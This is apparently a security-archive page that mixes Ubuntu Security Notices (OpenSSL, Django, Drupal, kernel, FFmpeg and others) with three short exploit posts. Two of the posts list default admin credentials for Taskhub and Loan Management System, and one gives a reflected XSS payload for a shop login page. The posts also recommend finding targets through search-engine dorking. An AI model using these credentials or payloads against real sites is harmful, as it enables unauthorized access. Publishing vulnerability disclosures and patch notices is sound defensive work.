Ubuntu Security Notice 6986-1 - David Benjamin discovered that OpenSSL incorrectly handled certain X.509 certificates. An attacker could possible use this issue to cause a denial of service or expose sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6986-1  
September 03, 2024

openssl vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS

Summary:

OpenSSL could be made to crash or expose sensitive information  
if it received a specially crafted certificate.

Software Description:  
- openssl: Secure Socket Layer (SSL) cryptographic library and tools

Details:

David Benjamin discovered that OpenSSL incorrectly handled certain  
X.509 certificates. An attacker could possible use this issue to  
cause a denial of service or expose sensitive information.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
  libssl3t64                      3.0.13-0ubuntu3.4  
  openssl                         3.0.13-0ubuntu3.4

Ubuntu 22.04 LTS  
  libssl3                         3.0.2-0ubuntu1.18  
  openssl                         3.0.2-0ubuntu1.18

After a standard system update you need to reboot your computer to make  
all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6986-1  
  CVE-2024-6119

Package Information:  
  https://launchpad.net/ubuntu/+source/openssl/3.0.13-0ubuntu3.4  
  https://launchpad.net/ubuntu/+source/openssl/3.0.2-0ubuntu1.18

Ubuntu Security Notice USN-6986-1

Ubuntu Security Notice 6981-2 - USN-6981-1 fixed vulnerabilities in Drupal. This update provides the corresponding updates for Ubuntu 14.04 LTS. It was discovered that Drupal incorrectly sanitized uploaded filenames. A remote attacker could possibly use this issue to execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6981-2September 03, 2024drupal7 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 14.04 LTSSummary:Drupal could be made to crash or run programs if it receivedspecially crafted network traffic.Software Description:- drupal7: fully-featured content management frameworkDetails:USN-6981-1 fixed vulnerabilities in Drupal. This update provides thecorresponding updates for Ubuntu 14.04 LTS.Original advisory details:  It was discovered that Drupal incorrectly sanitized uploaded filenames. A  remote attacker could possibly use this issue to execute arbitrary code.  (CVE-2020-13671)  It was discovered that Drupal incorrectly sanitized archived filenames. A  remote attacker could possibly use this issue to overwrite arbitrary  files, or execute arbitrary code. (CVE-2020-28948, CVE-2020-28949)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 14.04 LTS   drupal7                         7.26-1ubuntu0.1+esm2                                   Available with Ubuntu ProIn general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6981-2   https://ubuntu.com/security/notices/USN-6981-1   CVE-2020-13671, CVE-2020-28948, CVE-2020-28949

Ubuntu Security Notice USN-6981-2

Ubuntu Security Notice 6987-1 - It was discovered that Django incorrectly handled certain inputs. An attacker could possibly use this issue to cause a denial of service. It was discovered that Django incorrectly handled certain email sending failures. A remote attacker could possibly use this issue to enumerate user emails by issuing password reset requests and observing the outcomes.

==========================================================================  
Ubuntu Security Notice USN-6987-1  
September 03, 2024

python-django vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

Several security issues were fixed in Django.

Software Description:  
- python-django: High-level Python web development framework

Details:

It was discovered that Django incorrectly handled certain inputs.  
An attacker could possibly use this issue to cause a denial of service.  
(CVE-2024-45230)

It was discovered that Django incorrectly handled certain email sending  
failures. A remote attacker could possibly use this issue to enumerate  
user emails by issuing password reset requests and observing the outcomes.  
(CVE-2024-45231)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
  python3-django                  3:4.2.11-1ubuntu1.3

Ubuntu 22.04 LTS  
  python3-django                  2:3.2.12-2ubuntu1.14

Ubuntu 20.04 LTS  
  python3-django                  2:2.2.12-1ubuntu0.25

Ubuntu 18.04 LTS  
  python-django                   1:1.11.11-1ubuntu1.21+esm7  
                                  Available with Ubuntu Pro  
  python3-django                  1:1.11.11-1ubuntu1.21+esm7  
                                  Available with Ubuntu Pro

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6987-1  
  CVE-2024-45230, CVE-2024-45231

Package Information:  
  https://launchpad.net/ubuntu/+source/python-django/3:4.2.11-1ubuntu1.3  
  https://launchpad.net/ubuntu/+source/python-django/2:3.2.12-2ubuntu1.14  
  https://launchpad.net/ubuntu/+source/python-django/2:2.2.12-1ubuntu0.25

Ubuntu Security Notice USN-6987-1

Ubuntu Security Notice 6973-4 - It was discovered that a race condition existed in the Bluetooth subsystem in the Linux kernel, leading to a null pointer dereference vulnerability. A privileged local attacker could use this to possibly cause a denial of service. Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-6973-4September 02, 2024linux-raspi-5.4 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 18.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-raspi-5.4: Linux kernel for Raspberry Pi systemsDetails:It was discovered that a race condition existed in the Bluetooth subsystemin the Linux kernel, leading to a null pointer dereference vulnerability. Aprivileged local attacker could use this to possibly cause a denial ofservice (system crash). (CVE-2024-24860)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:   - SuperH RISC architecture;   - MMC subsystem;   - Network drivers;   - SCSI drivers;   - GFS2 file system;   - IPv4 networking;   - IPv6 networking;   - HD-audio driver;(CVE-2024-26830, CVE-2024-39484, CVE-2024-36901, CVE-2024-26929,CVE-2024-26921, CVE-2021-46926, CVE-2023-52629, CVE-2023-52760)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 18.04 LTS   linux-image-5.4.0-1115-raspi    5.4.0-1115.127~18.04.1                                   Available with Ubuntu Pro   linux-image-raspi-hwe-18.04     5.4.0.1115.127~18.04.1                                   Available with Ubuntu ProAfter a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6973-4   https://ubuntu.com/security/notices/USN-6973-3   https://ubuntu.com/security/notices/USN-6973-2   https://ubuntu.com/security/notices/USN-6973-1   CVE-2021-46926, CVE-2023-52629, CVE-2023-52760, CVE-2024-24860,   CVE-2024-26830, CVE-2024-26921, CVE-2024-26929, CVE-2024-36901,   CVE-2024-39484

Ubuntu Security Notice USN-6973-4

Taskhub version 2.8.8 suffers from an ignored default credential vulnerability.

**Taskhub 2.8.8 Insecure Settings**

Posted Sep 3, 2024

Authored by indoushka

Taskhub version 2.8.8 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 2c385d7b29ff2d1f0cadb673bff0447f2a27c839cc502710002b3eab58740544

Download | Favorite | View

**Taskhub 2.8.8 Insecure Settings**

    =============================================================================================================================================| # Title     : Taskhub v2.8.8 Insecure Settings Vulnerability                                                                              || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://codecanyon.net/item/taskhub-project-management-finance-crm-tool/25685874                                            |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@gmail.com & pass = 12345678[+] https://www/127.0.0.1/tasks.octalfoxcom/auth/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,625)
*   Arbitrary (17,028)
*   BBS (2,859)
*   Bypass (1,898)
*   CGI (1,047)
*   Code Execution (7,868)
*   Conference (692)
*   Cracker (844)
*   CSRF (3,420)
*   DoS (25,190)
*   Encryption (2,389)
*   Exploit (54,101)
*   File Inclusion (4,271)
*   File Upload (1,007)
*   Firewall (822)
*   Info Disclosure (2,911)
*   Intrusion Detection (916)
*   Java (3,155)
*   JavaScript (907)
*   Kernel (7,252)
*   Local (14,836)
*   Magazine (587)
*   Overflow (13,205)
*   Perl (1,435)
*   PHP (5,253)
*   Proof of Concept (2,399)
*   Protocol (3,745)
*   Python (1,652)
*   Remote (31,810)
*   Root (3,668)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,035)
*   Shell (3,295)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,291)
*   SQL Injection (16,693)
*   TCP (2,462)
*   Trojan (690)
*   UDP (919)
*   Virus (671)
*   Vulnerability (33,048)
*   Web (10,128)
*   Whitepaper (3,783)
*   x86 (969)
*   XSS (18,278)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,114)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,006)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,685)
*   Slackware (941)
*   Solaris (1,614)
*   SUSE (1,444)
*   Ubuntu (9,797)
*   UNIX (9,443)
*   UnixWare (187)
*   Windows (6,757)
*   Other

Taskhub 2.8.8 Insecure Settings

Ubuntu Security Notice 6984-1 - It was discovered that WebOb incorrectly handled certain URLs. An attacker could possibly use this issue to control a redirect or forward to another URL.

==========================================================================  
Ubuntu Security Notice USN-6984-1  
September 02, 2024

python-webob vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

WebOb could be made to redirect of forward to undesired URLs.

Software Description:  
- python-webob: Python module providing WSGI request and response objects

Details:

It was discovered that WebOb incorrectly handled certain URLs.  
An attacker could possibly use this issue to control a redirect or  
forward to another URL.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
  python3-webob                   1:1.8.7-1ubuntu0.1.24.04.1

Ubuntu 22.04 LTS  
  python3-webob                   1:1.8.6-1.1ubuntu0.1

Ubuntu 20.04 LTS  
  python3-webob                   1:1.8.5-2ubuntu0.1

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6984-1  
  CVE-2024-42353

Package Information:  
  https://launchpad.net/ubuntu/+source/python-webob/1:1.8.7-1ubuntu0.1.24.04.1  
  https://launchpad.net/ubuntu/+source/python-webob/1:1.8.6-1.1ubuntu0.1  
  https://launchpad.net/ubuntu/+source/python-webob/1:1.8.5-2ubuntu0.1

Ubuntu Security Notice USN-6984-1

Ubuntu Security Notice 6983-1 - Zeng Yunxiang discovered that FFmpeg incorrectly handled memory during video encoding. An attacker could possibly use this issue to perform a denial of service, or execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6983-1  
September 02, 2024

ffmpeg vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS

Summary:

FFmpeg could be made to crash or run programs as your login if it  
opened a specially crafted file.

Software Description:  
- ffmpeg: Tools for transcoding, streaming and playing of multimedia files

Details:

Zeng Yunxiang discovered that FFmpeg incorrectly handled memory during  
video encoding. An attacker could possibly use this issue to perform a  
denial of service, or execute arbitrary code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
   ffmpeg                          7:6.1.1-3ubuntu5+esm2  
                                   Available with Ubuntu Pro  
   libavcodec-dev                  7:6.1.1-3ubuntu5+esm2  
                                   Available with Ubuntu Pro  
   libavcodec-extra60              7:6.1.1-3ubuntu5+esm2  
                                   Available with Ubuntu Pro  
   libavcodec60                    7:6.1.1-3ubuntu5+esm2  
                                   Available with Ubuntu Pro  
   libavdevice60                   7:6.1.1-3ubuntu5+esm2  
                                   Available with Ubuntu Pro  
   libavfilter-extra9              7:6.1.1-3ubuntu5+esm2  
                                   Available with Ubuntu Pro  
   libavfilter9                    7:6.1.1-3ubuntu5+esm2  
                                   Available with Ubuntu Pro  
   libavformat-extra60             7:6.1.1-3ubuntu5+esm2  
                                   Available with Ubuntu Pro  
   libavformat60                   7:6.1.1-3ubuntu5+esm2  
                                   Available with Ubuntu Pro  
   libavutil58                     7:6.1.1-3ubuntu5+esm2  
                                   Available with Ubuntu Pro  
   libpostproc57                   7:6.1.1-3ubuntu5+esm2  
                                   Available with Ubuntu Pro  
   libswresample4                  7:6.1.1-3ubuntu5+esm2  
                                   Available with Ubuntu Pro  
   libswscale7                     7:6.1.1-3ubuntu5+esm2  
                                   Available with Ubuntu Pro

Ubuntu 22.04 LTS  
   ffmpeg                          7:4.4.2-0ubuntu0.22.04.1+esm5  
                                   Available with Ubuntu Pro  
   libavcodec-dev                  7:4.4.2-0ubuntu0.22.04.1+esm5  
                                   Available with Ubuntu Pro  
   libavcodec-extra58              7:4.4.2-0ubuntu0.22.04.1+esm5  
                                   Available with Ubuntu Pro  
   libavcodec58                    7:4.4.2-0ubuntu0.22.04.1+esm5  
                                   Available with Ubuntu Pro  
   libavdevice58                   7:4.4.2-0ubuntu0.22.04.1+esm5  
                                   Available with Ubuntu Pro  
   libavfilter-extra7              7:4.4.2-0ubuntu0.22.04.1+esm5  
                                   Available with Ubuntu Pro  
   libavfilter7                    7:4.4.2-0ubuntu0.22.04.1+esm5  
                                   Available with Ubuntu Pro  
   libavformat-extra58             7:4.4.2-0ubuntu0.22.04.1+esm5  
                                   Available with Ubuntu Pro  
   libavformat58                   7:4.4.2-0ubuntu0.22.04.1+esm5  
                                   Available with Ubuntu Pro  
   libavutil56                     7:4.4.2-0ubuntu0.22.04.1+esm5  
                                   Available with Ubuntu Pro  
   libpostproc55                   7:4.4.2-0ubuntu0.22.04.1+esm5  
                                   Available with Ubuntu Pro  
   libswresample3                  7:4.4.2-0ubuntu0.22.04.1+esm5  
                                   Available with Ubuntu Pro  
   libswscale5                     7:4.4.2-0ubuntu0.22.04.1+esm5  
                                   Available with Ubuntu Pro

Ubuntu 20.04 LTS  
   ffmpeg                          7:4.2.7-0ubuntu0.1+esm6  
                                   Available with Ubuntu Pro  
   libavcodec-dev                  7:4.2.7-0ubuntu0.1+esm6  
                                   Available with Ubuntu Pro  
   libavcodec-extra58              7:4.2.7-0ubuntu0.1+esm6  
                                   Available with Ubuntu Pro  
   libavcodec58                    7:4.2.7-0ubuntu0.1+esm6  
                                   Available with Ubuntu Pro  
   libavdevice58                   7:4.2.7-0ubuntu0.1+esm6  
                                   Available with Ubuntu Pro  
   libavfilter-extra7              7:4.2.7-0ubuntu0.1+esm6  
                                   Available with Ubuntu Pro  
   libavfilter7                    7:4.2.7-0ubuntu0.1+esm6  
                                   Available with Ubuntu Pro  
   libavformat58                   7:4.2.7-0ubuntu0.1+esm6  
                                   Available with Ubuntu Pro  
   libavresample4                  7:4.2.7-0ubuntu0.1+esm6  
                                   Available with Ubuntu Pro  
   libavutil56                     7:4.2.7-0ubuntu0.1+esm6  
                                   Available with Ubuntu Pro  
   libpostproc55                   7:4.2.7-0ubuntu0.1+esm6  
                                   Available with Ubuntu Pro  
   libswresample3                  7:4.2.7-0ubuntu0.1+esm6  
                                   Available with Ubuntu Pro  
   libswscale5                     7:4.2.7-0ubuntu0.1+esm6  
                                   Available with Ubuntu Pro

Ubuntu 18.04 LTS  
   ffmpeg                          7:3.4.11-0ubuntu0.1+esm6  
                                   Available with Ubuntu Pro  
   libavcodec-dev                  7:3.4.11-0ubuntu0.1+esm6  
                                   Available with Ubuntu Pro  
   libavcodec-extra57              7:3.4.11-0ubuntu0.1+esm6  
                                   Available with Ubuntu Pro  
   libavcodec57                    7:3.4.11-0ubuntu0.1+esm6  
                                   Available with Ubuntu Pro  
   libavdevice57                   7:3.4.11-0ubuntu0.1+esm6  
                                   Available with Ubuntu Pro  
   libavfilter-extra6              7:3.4.11-0ubuntu0.1+esm6  
                                   Available with Ubuntu Pro  
   libavfilter6                    7:3.4.11-0ubuntu0.1+esm6  
                                   Available with Ubuntu Pro  
   libavformat57                   7:3.4.11-0ubuntu0.1+esm6  
                                   Available with Ubuntu Pro  
   libavresample3                  7:3.4.11-0ubuntu0.1+esm6  
                                   Available with Ubuntu Pro  
   libavutil55                     7:3.4.11-0ubuntu0.1+esm6  
                                   Available with Ubuntu Pro  
   libpostproc54                   7:3.4.11-0ubuntu0.1+esm6  
                                   Available with Ubuntu Pro  
   libswresample2                  7:3.4.11-0ubuntu0.1+esm6  
                                   Available with Ubuntu Pro  
   libswscale4                     7:3.4.11-0ubuntu0.1+esm6  
                                   Available with Ubuntu Pro

Ubuntu 16.04 LTS  
   ffmpeg                          7:2.8.17-0ubuntu0.1+esm8  
                                   Available with Ubuntu Pro  
   libav-tools                     7:2.8.17-0ubuntu0.1+esm8  
                                   Available with Ubuntu Pro  
   libavcodec-dev                  7:2.8.17-0ubuntu0.1+esm8  
                                   Available with Ubuntu Pro  
   libavcodec-ffmpeg-extra56       7:2.8.17-0ubuntu0.1+esm8  
                                   Available with Ubuntu Pro  
   libavcodec-ffmpeg56             7:2.8.17-0ubuntu0.1+esm8  
                                   Available with Ubuntu Pro  
   libavdevice-ffmpeg56            7:2.8.17-0ubuntu0.1+esm8  
                                   Available with Ubuntu Pro  
   libavfilter-ffmpeg5             7:2.8.17-0ubuntu0.1+esm8  
                                   Available with Ubuntu Pro  
   libavformat-ffmpeg56            7:2.8.17-0ubuntu0.1+esm8  
                                   Available with Ubuntu Pro  
   libavresample-ffmpeg2           7:2.8.17-0ubuntu0.1+esm8  
                                   Available with Ubuntu Pro  
   libavutil-ffmpeg54              7:2.8.17-0ubuntu0.1+esm8  
                                   Available with Ubuntu Pro  
   libpostproc-ffmpeg53            7:2.8.17-0ubuntu0.1+esm8  
                                   Available with Ubuntu Pro  
   libswresample-ffmpeg1           7:2.8.17-0ubuntu0.1+esm8  
                                   Available with Ubuntu Pro  
   libswscale-ffmpeg3              7:2.8.17-0ubuntu0.1+esm8  
                                   Available with Ubuntu Pro

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6983-1  
   CVE-2024-32230

Ubuntu Security Notice USN-6983-1

Ubuntu Security Notice 6982-1 - It was discovered that Dovecot did not not properly have restrictions on the size of address headers. A remote attacker could possibly use this issue to cause denial of service.

    ==========================================================================Ubuntu Security Notice USN-6982-1September 02, 2024dovecot vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 24.04 LTSSummary:Several security issues were fixed in Dovecot.Software Description:- dovecot: IMAP and POP3 email serverDetails:It was discovered that Dovecot did not not properly have restrictions onithe size of address headers. A remote attacker could possibly use thisissue to cause denial of service. (CVE-2024-23184, CVE-2024-23185)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 24.04 LTS  dovecot-core                    1:2.3.21+dfsg1-2ubuntu6In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-6982-1  CVE-2024-23184, CVE-2024-23185Package Information:  https://launchpad.net/ubuntu/+source/dovecot/1:2.3.21+dfsg1-2ubuntu6

Ubuntu Security Notice USN-6982-1

Online Musical Instrument Shop IN version 1.0 suffers from a cross site scripting vulnerability.

**Online Musical Instrument Shop IN 1.0 Cross Site Scripting**

Posted Sep 2, 2024

Authored by indoushka

Online Musical Instrument Shop IN version 1.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 2e3a9e009b49f67ad6f0534a437aba16431617d1d2588b6c4ed1087d4399d493

Download | Favorite | View

**Online Musical Instrument Shop IN 1.0 Cross Site Scripting**

    ====================================================================================================================================================| # Title     : Online Musical Instrument Shop IN v1.0 XSS Vulnerability                                                                           || # Author    : indoushka                                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                                   || # Vendor    : https://download-media.code-projects.org/2020/04/Online_Musical_Instrument_Shop_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip |====================================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : admin_area/login.php?not_admin=You%2520are%2520not%2520Admin.'"()%26%25<acx><ScRiPt >prompt(925772)</ScRiPt>[+] Panel : http://127.0.0.1/ecommerce/admin_area/login.php?not_admin=You%2520are%2520not%2520Admin.%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(925772)%3C/ScRiPt%3EGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,597)
*   Arbitrary (17,025)
*   BBS (2,859)
*   Bypass (1,898)
*   CGI (1,047)
*   Code Execution (7,867)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,418)
*   DoS (25,183)
*   Encryption (2,389)
*   Exploit (54,093)
*   File Inclusion (4,271)
*   File Upload (1,006)
*   Firewall (822)
*   Info Disclosure (2,910)
*   Intrusion Detection (916)
*   Java (3,155)
*   JavaScript (907)
*   Kernel (7,249)
*   Local (14,833)
*   Magazine (587)
*   Overflow (13,203)
*   Perl (1,435)
*   PHP (5,253)
*   Proof of Concept (2,399)
*   Protocol (3,745)
*   Python (1,651)
*   Remote (31,809)
*   Root (3,668)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,035)
*   Shell (3,295)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,291)
*   SQL Injection (16,692)
*   TCP (2,462)
*   Trojan (690)
*   UDP (919)
*   Virus (671)
*   Vulnerability (33,046)
*   Web (10,128)
*   Whitepaper (3,782)
*   x86 (969)
*   XSS (18,277)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,114)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (50,978)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,661)
*   Slackware (941)
*   Solaris (1,614)
*   SUSE (1,444)
*   Ubuntu (9,794)
*   UNIX (9,443)
*   UnixWare (187)
*   Windows (6,756)
*   Other

Online Musical Instrument Shop IN 1.0 Cross Site Scripting

Loan Management System 2024 version 1.0 suffers from an ignored default credential vulnerability.

**Loan Management System 2024 1.0 Insecure Settings**

Posted Sep 2, 2024

Authored by indoushka

Loan Management System 2024 version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 4e37e483991ec7b37ab54ed035920c62f7033979ca509714b26270c8fabb131b

Download | Favorite | View

**Loan Management System 2024 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : Loan Management System 2024 v1.0 Insecure Settings Vulnerability                                                            || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/15529/loan-management-system-oop-php-mysqlijquery-free-source-code.html                  |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin[+] https://www/127.0.0.1/165.232.176.12/index.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,597)
*   Arbitrary (17,025)
*   BBS (2,859)
*   Bypass (1,898)
*   CGI (1,047)
*   Code Execution (7,867)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,418)
*   DoS (25,183)
*   Encryption (2,389)
*   Exploit (54,093)
*   File Inclusion (4,271)
*   File Upload (1,006)
*   Firewall (822)
*   Info Disclosure (2,910)
*   Intrusion Detection (916)
*   Java (3,155)
*   JavaScript (907)
*   Kernel (7,249)
*   Local (14,833)
*   Magazine (587)
*   Overflow (13,203)
*   Perl (1,435)
*   PHP (5,253)
*   Proof of Concept (2,399)
*   Protocol (3,745)
*   Python (1,651)
*   Remote (31,809)
*   Root (3,668)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,035)
*   Shell (3,295)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,291)
*   SQL Injection (16,692)
*   TCP (2,462)
*   Trojan (690)
*   UDP (919)
*   Virus (671)
*   Vulnerability (33,046)
*   Web (10,128)
*   Whitepaper (3,782)
*   x86 (969)
*   XSS (18,277)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,114)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (50,978)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,661)
*   Slackware (941)
*   Solaris (1,614)
*   SUSE (1,444)
*   Ubuntu (9,794)
*   UNIX (9,443)
*   UnixWare (187)
*   Windows (6,756)
*   Other

Tag

#ubuntu